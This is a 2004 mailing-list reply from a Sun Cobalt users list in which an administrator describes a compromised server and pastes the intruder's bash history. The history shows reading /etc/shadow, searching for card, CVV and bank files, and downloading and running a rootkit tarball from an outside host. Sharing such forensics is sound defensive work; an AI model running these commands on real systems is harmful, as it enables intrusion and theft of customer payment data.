[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] CHkrootkit output

Subject: Re: [cobalt-users] CHkrootkit output
From: "PageKeeper Service" <host@xxxxxxxxxxxxxxxxxxxxx>
Date: Sun Apr 18 10:42:01 2004
List-id: Mailing list for users to share thoughts on Sun Cobalt products. <cobalt-users.list.cobalt.com>

> > Subject: Re: [cobalt-users] CHkrootkit output
> >
> >
> > > >
> > > > I believe that machine has been hacked. Is cron doing weird stuff?
> Other
> > > > processes like devine?
> > >
> > >
> > > And you conclusion is based on ??
> > Seeing it first hand. Some notes..
> > Cron will work. Tuning it off is the problem, a process called devine
> > will popup usually once a day and stay running. Its nasty. Believe it
can
> > sniff the username and pw of clients
> > isp logins besides the system passwords. They used a wget from the
server
> to
> > download it from a free isp in europe.
> > They entered through a script called phpnuke one time and cgi (forgot
the
> > name) on another raq4. Other than those
> > notes it ran fine. It also searches files for cc numbers, email
addresses
> > and any ftp user connections from any scripts.
> > Once I saw that, it went offline. A reboot usually starts the ball
rolling
> > if I remember right,
> > then clients can be locked out of shell and ftp along with the admin.
mods
> > to the hosts.deny and allow files.
> >
> > > Cron is fully operational and normail.
> > >
> > > No strange processess
> >

> This is  .bash_history detail and where it came from..... Note: I blocked
the ip it before it could send.
> [root /]# cat .bash_history
> id
> cat /etc/shadow
> mkdir /usr/lib/lib.a
> ps x
> cd /usr/lib/lib.a
> locate order.txt
> locate visa
> cd /home/sites/home/
> ls
> cd passwords
> ls
> cd ..
> cd web
> ls
> cd cgi-bin
> ls
> cd SSL
> ls
> cd ..
> cd hosting
> ls
> locate data.txt
> cat /home/sites/site10/web/scripts/mb/data.txt
> cat /home/sites/home/web/UserWeather/dat/data.txt
> cat /home/sites/home/web/UserWeather/counter/data.txt
> locate cvv
> cd /home/sites/site4/web/cgi-bin/order/
> ls
> cd data
> ls
> cd /home/sites/site12/web/cgi-bin/WWE/
> ls
> cat apwf.txt
> cd ..
> ls
> cd usa
> cd USA
> ls
> cd ..
> cd recluse
> ls
> locate bank
> cat /etc/hosts
> cd /usr/lib/lib.a
> wget it.geocities.com/sballo1984/skr.tar.gz
> tar zxvf skr.tar.gz
> cd skr
> ./setup dio


> >   David Hahn
> >   PageKeeper Service
> >   1512 Deborah Road #102
> >   Rio Rancho, New Mexico 87124 US
> >   505-892-8723
> >   http://www.pagekeeperservice.com

References:
- [cobalt-users] Virus Scanner and Spam Filter for RAQ3 Server
  - From: Giby P
- Re: [cobalt-users] CHkrootkit output
  - From: William J.A. Brillinger
- Re: [cobalt-users] CHkrootkit output
  - From: R. Hamburg .: HaVa Web- & Processdesign :.
- Re: [cobalt-users] CHkrootkit output
  - From: PageKeeper Service
- Re: [cobalt-users] CHkrootkit output
  - From: R. Hamburg .: HaVa Web- & Processdesign :.
- Re: [cobalt-users] CHkrootkit output
  - From: PageKeeper Service
- Re: [cobalt-users] CHkrootkit output
  - From: Ted

Prev by Date: Re: [cobalt-users] CHkrootkit output
Next by Date: Re: [cobalt-users] CHkrootkit output
Previous by thread: Re: [cobalt-users] CHkrootkit output
Next by thread: Re: [cobalt-users] CHkrootkit output

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index